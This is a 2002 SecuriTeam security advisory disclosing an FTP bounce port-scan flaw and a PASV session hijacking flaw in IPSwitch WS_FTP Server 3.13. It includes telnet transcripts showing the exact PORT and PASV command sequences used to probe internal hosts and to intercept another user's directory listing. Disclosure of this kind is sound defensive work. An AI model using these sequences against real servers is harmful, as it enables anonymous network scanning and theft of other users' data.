[NT] IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan

From: support@securiteam.com
Date: 10/25/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Oct 2002 17:07:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan
------------------------------------------------------------------------

SUMMARY

IPSwitch's WS_FTP Server allows remote attackers to do two things, one use
it to bounce attacks through the FTP Server, and to hijack existing FTP
Sessions.

DETAILS

Vulnerable systems:
 * IPSwitch WS_FTP Server version 3.13

Impact:
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater
than 1024. Thus, the attacker can scan Internet addresses anonymously
along with any internal addresses that the FTP server has access to. More
information on this vulnerability can be found here:
<http://www.cert.org/advisories/CA-1997-27.html.>
http://www.cert.org/advisories/CA-1997-27.html.

The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file
uploads may also be spoofed. No authentication is necessary to execute
this attack. More information on this vulnerability can be found here:
<http://www.kb.cert.org/vuls/id/2558> http://www.kb.cert.org/vuls/id/2558.

Details:
This demonstrates the FTP bounce vulnerability. The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or
not accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.

This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing

Next, from another IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.

ADDITIONAL INFORMATION

The information has been provided by <mailto:lowhalo@hushmail.com> low
halo.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages